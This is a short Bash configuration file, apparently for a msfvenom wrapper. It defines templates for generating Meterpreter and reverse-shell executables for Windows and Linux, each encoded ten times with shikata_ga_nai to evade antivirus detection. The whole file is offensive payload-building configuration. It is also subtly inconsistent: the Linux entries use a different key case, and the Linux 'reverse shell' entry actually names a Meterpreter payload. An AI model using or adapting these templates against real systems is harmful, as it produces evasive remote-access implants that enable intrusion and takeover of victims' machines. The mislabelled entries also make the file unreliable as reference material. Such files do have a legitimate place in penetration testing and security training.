# msfvenom.conf
# Here, all the templates reside.
# Make sure you declare yours as well as follow the example.
# You can also modify the configuration as well.

declare -A METERPRETER_WINDOWS
METERPRETER_WINDOWS=(
    ["name"]="Meterpreter for Windows"
    ["PAYLOAD"]="windows/meterpreter_reverse_tcp"
    ["ENCODER"]="x86/shikata_ga_nai"
    ["ITERATIONS"]=10
    ["FORMAT"]="exe"
    ["ARCH"]="x86"
    ["PLATFORM"]="windows"
)

declare -A RSHELL_WINDOWS
RSHELL_WINDOWS=(
    ["name"]="Reverse shell for windows"
    ["PAYLOAD"]="windows/shell_reverse_tcp"
    ["ENCODER"]="x86/shikata_ga_nai"
    ["ITERATIONS"]=10
    ["FORMAT"]="exe"
    ["ARCH"]="x86"
    ["PLATFORM"]="windows"
)

declare -A METERPRETER_LINUX
METERPRETER_LINUX=(
    ["name"]="Meterpreter for Linux"
    ["payload"]="linux/x86/meterpreter_reverse_tcp"
    ["ENCODER"]="x86/shikata_ga_nai"
    ["ITERATIONS"]=10
    ["FORMAT"]="elf"
    ["ARCH"]="x86"
    ["PLATFORM"]="linux"
)

declare -A RSHELL_LINUX
RSHELL_LINUX=(
    ["name"]="Reverse shell for linux"
    ["payload"]="linux/x86/meterpreter_reverse_tcp"
    ["ENCODER"]="x86/shikata_ga_nai"
    ["ITERATIONS"]=10
    ["FORMAT"]="elf"
    ["ARCH"]="x86"
    ["PLATFORM"]="linux"
)